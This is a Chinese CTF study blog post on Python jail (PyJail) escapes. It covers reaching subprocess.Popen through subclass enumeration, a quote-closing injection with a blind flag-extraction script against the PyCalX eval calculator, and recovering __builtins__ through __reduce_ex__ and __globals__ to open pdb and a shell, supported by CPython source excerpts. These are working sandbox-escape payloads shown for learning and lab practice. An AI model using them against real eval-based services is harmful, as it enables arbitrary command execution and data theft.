我要成为PyJail大师

不是炒米线2025-12-102025-12-25

例题：Object获取

这里放一道题目的PyJail部分。

import subprocess # 原题不是这样导入的，不过意思一下吧

def pyjail(code):
    blacklist = ['\\x','+','join', '"', "'", '[', ']', '2', '3', '4', '5', '6', '7', '8', '9']
    for i in blacklist:
        if i in code:
            return 'Invalid code'

    safe_globals = {'__builtins__':None, 'lit':list, 'dic':dict}
    print(repr(eval(code, safe_globals)))


payload = "{c.__name__:c for c in lit.__base__.__subclasses__()}.get(lit(dic(Popen=1)).pop())(lit((lit(dic(cat=1)).pop(),lit(dic(flag=1)).pop())),**dic(stdout=1-1-1)).communicate()"

pyjail(payload)

解析：

{c.__name__:c for c in lit.__base__.__subclasses__()}: 遍历所有子类，生成一个字典，Key是类名（字符串），Value是类对象。
.get(lit(dic(Popen=1)).pop()):
- dic(Popen=1) 生成 {‘Popen’: 1}。
- lit(…) 转为列表 [‘Popen’]。
- .pop() 取出字符串 ‘Popen’。
所以lit(dic(Popen=1)).pop() = ‘Popen’
.get(...) 从第一步的字典中拿到 subprocess.Popen 类。

{c.__name__:c for c in lit.__base__.__subclasses__()}.get(lit(dic(Popen=1)).pop())，这一步执行结果是<class 'subprocess.Popen'>

(...): 实例化 Popen 类。
- lit((lit(dic(cat=1)).pop(), lit(dic(flag=1)).pop())): 这是第一个参数 args。内部生成了 ‘cat’ 和 ‘flag’ 字符串。外层 lit((…)) 将元组转为列表 [‘cat’, ‘flag’]。

其实到这一步就可以了，但如果没有输出到eval的终端就可能没有回显，用下面的方法可以将输出的字符串作为eval的返回值。

**dic(stdout=1-1-1): 这是 kwargs。生成 {‘stdout’: -1} 并解包传给 Popen，相当于 stdout=subprocess.PIPE。
.communicate(): 执行命令并读取结果。

至此构造出完整的payload:

1	{c.__name__:c for c in lit.__base__.__subclasses__()}.get(lit(dic(Popen=1)).pop())(lit((lit(dic(cat=1)).pop(),lit(dic(flag=1)).pop())),**dic(stdout=1-1-1)).communicate()

例题：引号闭合

PyCalX 1

#!/usr/bin/env python3
import cgi;
import sys
from html import escape

FLAG = open('/var/www/flag','r').read()

OK_200 = """Content-type: text/html
省略，传入value1/op/value2三个参数
"""

print(OK_200)
arguments = cgi.FieldStorage()

if 'source' in arguments:
    source = arguments['source'].value
else:
    source = 0

if source == '1':
    print('<pre>'+escape(str(open(__file__,'r').read()))+'</pre>')

if 'value1' in arguments and 'value2' in arguments and 'op' in arguments:

    def get_value(val):
        val = str(val)[:64]
        if str(val).isdigit(): return int(val)
        blacklist = ['(',')','[',']','\'','"'] # I don't like tuple, list and dict.
        if val == '' or [c for c in blacklist if c in val] != []:
            print('<center>Invalid value</center>')
            sys.exit(0)
        return val

    def get_op(val):
        val = str(val)[:2]
        list_ops = ['+','-','/','*','=','!']
        if val == '' or val[0] not in list_ops:
            print('<center>Invalid op</center>')
            sys.exit(0)
        return val

    op = get_op(arguments['op'].value)
    value1 = get_value(arguments['value1'].value)
    value2 = get_value(arguments['value2'].value)

    if str(value1).isdigit() ^ str(value2).isdigit():
        print('<center>Types of the values don\'t match</center>')
        sys.exit(0)

    calc_eval = str(repr(value1)) + str(op) + str(repr(value2))

    print('<div class=container><div class=row><div class=col-md-2></div><div class="col-md-8"><pre>')
    print('>>>> print('+escape(calc_eval)+')')

    try:
        result = str(eval(calc_eval))
        if result.isdigit() or result == 'True' or result == 'False':
            print(result)
        else:
            print("Invalid") # Sorry we don't support output as a string due to security issue.
    except:
        print("Invalid")


    print('>>> </pre></div></div></div>')

是一个计算器，会evalvalue1+op+value2，不过有一些限制：

value1和value2不能出现"()[]\'
op的第一个字符只能是+-/*=!，且长度为1或2

看eval的代码怎么构成：

1	calc_eval = str(repr(value1)) + str(op) + str(repr(value2))

这个插播了解一下repr函数。菜鸟网站说，repr() 函数将对象转化为供解释器读取的形式。
我们来个实际例子看一下：

>>> s = 'ChaoMixian'
>>> repr(s)
"'ChaoMixian'"

>>> s = ["ChaoMixian", "Loves", "Mixian"]
>>> repr(s)
"['ChaoMixian', 'Loves', 'Mixian']"

>>> s = 114514
>>> repr(s)
'114514'

>>> s = "1919810"
>>> repr(s)
"'1919810'"
>>> repr(int(s))
'1919810'

>>> repr(__import__("os"))
"<module 'os' (frozen)>"

这几个例子很清楚了，一句话来说，repr会把对象转为字符串。但对于PyJail题目来说，更重要的是repr对不同类型对象的处理。对于数字类型，repr的结果会自动加上'单引号，正因这个特性，我们可以结合sql注入时的思路，提前闭合单引号，从而执行我们想要执行的代码。

以本题为例
当value1=114，op=+，value2=test时，repr(value1)的结果是'114'，repr(value2)的结果是"'test'"。注意int与str的区别。

1	calc_eval = str(repr(value1)) + str(op) + str(repr(value2))

上述语句进一步展开会得到：

1	calc_eval = str('114') + str('+') + str("'test'")

最终的结果就是：

1	114+'test'

我们来回忆一下sql注入是怎么做的？提前闭合引号的。在PyJail中，我们同样可以这么做

回到本题，由于value1和2严格限制了特殊字符，我们没办法在这里提前闭合引号。但op可以！仔细看op的限制

def get_op(val):
    val = str(val)[:2]
    list_ops = ['+','-','/','*','=','!']
    if val == '' or val[0] not in list_ops:
        print('<center>Invalid op</center>')
        sys.exit(0)
    return val

可以看到，op长度要小于等于2，另外实际上只检查了val[0]，即第一位不能有被ban的字符，这意味着第二位可以是'单引号，用来提前闭合。

我们这样构造：

1
2
3

value1 = test
op = +'
value1 = chao

这时候再来看看calc_eval会怎么样：

1	calc_eval = str("'test'") + str("+'") + str("'chao'")

继续展开得到

1	'test'+''chao'

发现了嘛，chao前面的单引号与op自己的单引号闭合了。这时候这个chao实际上就是我们可控的注入的命令，但要先解决一个问题，让后面的单引号实效，常见的方式是用#井号注释掉（本题没有ban这个）。这里可以思考一下，如果value1和2是整数时会怎么样？

我们来实践一下

1
2
3

value1 = test
op = +'
value1 =  and FLAG#

把参数放入语句：

1	calc_eval = str("'test'") + str("+'") + str("'and FLAG#'")

继续展开

1	'test'+'' and FLAG#''

由于#井号注释掉了最后的两个单引号，所以实际上eval的语句是这样的：

1	'test' and FLAG

由于 and 总是返回第一个假值；如果没有假值，就返回最后一个。这里'test'不为空即为真，因此会输出FLAG。我们本地测试一下：

and

确实打印出了flag！不过填入靶机web却提示invalid？

invalid

回归源码，显然我们是无法绕过isdigit的。不过题目允许输出True和False，自然联想到sql盲注，这里可以用类似的思路。

result = str(eval(calc_eval))
if result.isdigit() or result == 'True' or result == 'False':
    print(result)
else:
    print("Invalid") # Sorry we don't support output as a string due to security issue.

不过我们如何传入猜测的flag呢？value1和2都过滤了引号，意味着我们不可能凭空生出一个字符串。不过既然value1和value2都可以利用，不妨让value1为猜测的flag，value2为and语句用于比较。好的我们试试看。
分别传入以下参数，返回为True。

1
2
3

flag
+'
and value1 in FLAG#

这个and前的空格加不加无所谓

稍微修改value1，构造一个肯定不是flag的值，比如flaga，发现返回值变成False了。确认盲注可行，开始写exp脚本。

import requests
url1="http://771ceb77-875c-403d-afa4-e2dd7b08c84f.node5.buuoj.cn:81/cgi-bin/pycalx.py?value1="
url2 = "&op=%2b'&value2=+and+True+and+value1+in+FLAG%23"

s='abcdefghijkmnlopqrstuvwxyz0123456789-}{'
flag='flag{'
while True:
    for i in s:
        url=url1+flag+i+url2
        r=requests.get(url).text
        print(url)
        if 'True\n>>>' in r: # 因为True会出现在语句里，所以加点定位锚点
            flag+=i
            print(flag)
            if i == '}':
                exit()
            break

动态flag就不放了。另外分享一种别处看到的解法，其实差不多吧：传送门

原理差不多吧，只不过flag通过source参数传入。source是用来判断是否显示源码的。这个倒是提醒到，关注全局变量在ctf中的应用。

1	'test'+'' and source in FLAG#''

附加题🌚：

print(1 and True)     # True
print(0 and True)     # 0
print('0' and True)   # 0j，这是虚数
print(0j and True)    # 0
print(0 and 114)      # 0
print("yes" and "no") # no

那这个呢🌚？

1	print(Love and NotLove)

nolove

PyCalX 2

对比一下有什么区别。

1	op = get_op(get_value(arguments['op'].value))

就这一行，将op也加入了value的waf。

现在：

value1和value2和op不能出现"()[]\'
op的第一个字符只能是+-/*=!，且长度为1或2

魔术方法

`__reduce_ex`获取`builtins__`

以?CTF 2025 Week4 里的《关于我穿越到CTF的异世界这档事:终》为例

#!/usr/bin/env python3
import re

def prime_check(n: int) -> bool:
    if n < 2:
        return False
    for i in range(2, n):
        if n % i == 0:
            return False
    return True

ALLOWED = "abcdefghij0klmnopqrstuvwxyz:_.[]()<=,'"
print("Welcome to the Null Jail.想出去吗?你得先告诉我口令")
user_src = input("Tell me the Password: ")
filtered = ''.join(ch for ch in user_src if ch in ALLOWED)

if (
    len(filtered) > 150
    or not filtered.isascii()
    or "eta" in filtered
    or filtered.count("(") > 3
):
    print("没这么长，我看你是一点不懂哦")
    raise SystemExit

for m in re.finditer(r"\w+", filtered):
    if not prime_check(len(m.group(0))):
        print("这家伙在说什么呢。")
        raise SystemExit

eval(filtered, {'__builtins__': {}})

“主要的限制就是no builtins 和一切变量名/数值/带_的字符的长度需要是素数。首先no builtins基本就只能从现有的基本内置类型找突破口了”

这里先直接给出exp：

1	[bi:=00==000,ci:=bi<<bi,[].__reduce_ex__(ci)[00].__globals__['__built''ins__']['__imp''ort__']('pdb').run('asd')]

接下来来分析这个exp。起一个REPL

1 2	>>> [].__reduce_ex__(2)[0] <function __newobj__ at 0x101288fe0>

reduce_ex(protocol)，在 protocol ≥ 2 时采用更高级的重建方式(低版本不支持内建类型的unpickling)

这题限制了只有数字0，因此至少需要构造出一个>=2的数字。官方wp的做法是 0==0返回True，也就是1，然后1<<1左移一位得到2。eval里可以使用海象运算符，动态赋值。

思路差不多理顺，但为啥[].__reduce_ex__(2)[0]能够接__globals__从而引出被ban调的__builtins__？那就要去了解一下__newobj__。在此之前，我想补充一下CPython的命名空间概念。

什么是命名空间？

在 CPython 里，命名空间就是一个名字到对象的字典。

例如：

模块的全局变量是一个命名空间
函数的局部变量是一个命名空间
类体内部定义阶段也有自己的命名空间
eval、exec 的环境也是命名空间

Python 查名字，是按“作用域链”查字典：

局部命名空间（locals）
全局命名空间（globals）
内建命名空间（builtins）

这三层构成一条链。从上到下依次查找，最后找不到就 NameError。

所以eval(expr, globals, locals) 里的 globals 和 locals 就是你给 eval 临时塞进去的命名空间字典。

例如：

1	eval("x+1", {"x": 10})

里面执行的代码只能访问：
{“x”: 10, “builtins“:}

其实很好理解啦，函数在执行的时候，解释器会注入这三层命名空间。联系python的局部变量、全局变量不难理解这样设计的用意。

什么是`globals`？

上面讲到，有个全局命名空间（globals）。对象.__global__可以访问到该对象的全局命名空间。

CPython的函数分为Python 函数（function object）和C 函数（builtin_function_or_method），其中Python函数一定有__globals__，C函数绝大多数没有__globals__。

Python 函数对象本身在 C 层面被实现为一个名为 PyFunctionObject 的结构体，这个结构体内部存储了指向其 __globals__ 字典的指针。换句话说，在C-Level，根本没有__globals__这种python抽象的东西。

>>> type(len)
<class 'builtin_function_or_method'>

>>> def f(): pass
... type(f)
<class 'function'>

这里定义一个Python层的函数来看一下：

>>> def f(): pass
... f
<function f at 0x103204d60>

>>> f.__globals__
{'__name__': '__main__', '__doc__': None, '__package__': '_pyrepl', '__loader__': None, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': '/Users/chao/miniconda3/lib/python3.13/_pyrepl/__main__.py', '__cached__': '/Users/chao/miniconda3/lib/python3.13/_pyrepl/__pycache__/__main__.cpython-313.pyc', 'f': <function f at 0x103204d60>}

再拿内置的len函数试一下：

>>> len
<built-in function len>

>>> len.__globals__
Traceback (most recent call last):
  File "<python-input-11>", line 1, in <module>
    len.__globals__
AttributeError: 'builtin_function_or_method' object has no attribute '__globals__'

其实这里去看一下vFlow的Kotlin层和Executor的上下文实现就很好理解了：D

话题再扯回来，使用__globals__可以干嘛？尽管eval的命名空间将其设置为空，但每个函数的__globals__命名空间实际上是独立的，这意味着只要找到一个可以访问原始__globals__命名空间的Python层函数，就可以访问到__builtins__，然后什么__import__啊就都好说。

1 2	>>> ''.__reduce_ex__ <built-in method __reduce_ex__ of str object at 0x102683c80>

什么是`newobj`？

不过这个__reduce_ex__很特殊啊，pickle明明是C函数，为啥__reduce_ex__(2)[0]却返回了一个python函数捏？（有__globals__）。这里可以结合源码看一下。这实际上也是PEP 307的具体组成部分。

当前latest的CPython实现如下：

static PyObject *
object___reduce_ex___impl(PyObject *self, int protocol)
/*[clinic end generated code: output=2e157766f6b50094 input=f326b43fb8a4c5ff]*/
{
#define objreduce \
    (_Py_INTERP_CACHED_OBJECT(_PyInterpreterState_Get(), objreduce))
    PyObject *reduce, *res;

    if (objreduce == NULL) {
        PyObject *dict = lookup_tp_dict(&PyBaseObject_Type);
        objreduce = PyDict_GetItemWithError(dict, &_Py_ID(__reduce__));
        if (objreduce == NULL && PyErr_Occurred()) {
            return NULL;
        }
    }

    if (_PyObject_LookupAttr(self, &_Py_ID(__reduce__), &reduce) < 0) {
        return NULL;
    }
    if (reduce != NULL) {
        PyObject *cls, *clsreduce;
        int override;

        cls = (PyObject *) Py_TYPE(self);
        clsreduce = PyObject_GetAttr(cls, &_Py_ID(__reduce__));
        if (clsreduce == NULL) {
            Py_DECREF(reduce);
            return NULL;
        }
        override = (clsreduce != objreduce);
        Py_DECREF(clsreduce);
        if (override) {
            res = _PyObject_CallNoArgs(reduce);
            Py_DECREF(reduce);
            return res;
        }
        else
            Py_DECREF(reduce);
    }

    return _common_reduce(self, protocol);  // 关注return
#undef objreduce
}

呃，继续跟踪_common_reduce：

/*
 * There were two problems when object.__reduce__ and object.__reduce_ex__
 * were implemented in the same function:
 *  - trying to pickle an object with a custom __reduce__ method that
 *    fell back to object.__reduce__ in certain circumstances led to
 *    infinite recursion at Python level and eventual RecursionError.
 *  - Pickling objects that lied about their type by overwriting the
 *    __class__ descriptor could lead to infinite recursion at C level
 *    and eventual segfault.
 *
 * Because of backwards compatibility, the two methods still have to
 * behave in the same way, even if this is not required by the pickle
 * protocol. This common functionality was moved to the _common_reduce
 * function.
 */
static PyObject *
_common_reduce(PyObject *self, int proto)
{
    PyObject *copyreg, *res;

    if (proto >= 2)     // 我们就传入2
        return reduce_newobj(self);     // 继续跟踪这个函数

    copyreg = import_copyreg();
    if (!copyreg)
        return NULL;

    res = PyObject_CallMethod(copyreg, "_reduce_ex", "Oi", self, proto);
    Py_DECREF(copyreg);

    return res;
}

看注释就可以得知，这个**reduce_ex**依然存在是为了前向兼容性，后续版本可能就没了…当protocol>=2时，return了reduce_newobj(self)，继续跟踪这个函数，关注这几个语句：

// ...
copyreg = import_copyreg();
// ...
newobj = PyObject_GetAttr(copyreg, &_Py_ID(__newobj__));
// ...

再来看看这个import_copyreg():

static PyObject *
import_copyreg(void)
{
    /* Try to fetch cached copy of copyreg from sys.modules first in an
       attempt to avoid the import overhead. Previously this was implemented
       by storing a reference to the cached module in a static variable, but
       this broke when multiple embedded interpreters were in use (see issue
       #17408 and #19088). */
    PyObject *copyreg_module = PyImport_GetModule(&_Py_ID(copyreg));
    if (copyreg_module != NULL) {
        return copyreg_module;
    }
    if (PyErr_Occurred()) {
        return NULL;
    }
    return PyImport_Import(&_Py_ID(copyreg));
}

也就是说，它从 Python 模块 copyreg 中查找属性 “newobj”。再去Lib/copyreg.py看看具体实现。

# Helper for __reduce_ex__ protocol 2

def __newobj__(cls, *args):
    return cls.__new__(cls, *args)

def __newobj_ex__(cls, args, kwargs):
    """Used by pickle protocol 4, instead of __newobj__ to allow classes with
    keyword-only arguments to be pickled correctly.
    """
    return cls.__new__(cls, *args, **kwargs)

到这里，一切就都清晰明了了。这个__newobj__确实是一个Python-Level的函数。

好了回归题目。经过以上分析，我们不难发现，当__builtins__被ban时，我们可以找到一个函数，通过它的__globals__访问__builtins__

前人经过探索，恰巧发现了[].__reduce_ex__(2)[0]，返回的就是__newobj__，完美符合以上条件。而且此调用链依赖少，因此在大多数场景都可以使用（而且不用去凑索引）。

所以实际调用链为：

list.__reduce_ex__(2) 返回一个 tuple
tuple[0] 是内置的“对象构造器”函数 __newobj__
__newobj__ 具有自己的 __globals__
__globals__ 中含有真正的 __builtins__
__builtins__ 中有导入库的 __import__

具体构建

这一部分在本文反而不作为重点，它更像是一种技巧吧。

由于只有一个0，在__reduce_ex__我们想要控制协议版本>=2(低版本不支持内建类型的unpickling)所以给了位运算符来拿到2,由于在python中bool和int是可以运算的那么就会想到用0==0来构造出1,左移1位就是2

因为在eval中是不支持赋值的，所以要用海象运算符:=来进行替换，并且有了海象表达式要用[]包裹一下，才可以被解析位为一个合法的表达式

本题有一个质数限制和左括号数量限制，具体去看官方wp

本题最终解法是pdb

1	[bi:=00==000,ci:=bi<<bi,[].__reduce_ex__(ci)[00].__globals__['__built''ins__']['__imp''ort__']('pdb').run('asd')]

进入pdb后可执行任意python代码。

1
2
3

import os
os.system('sh')
cat /flag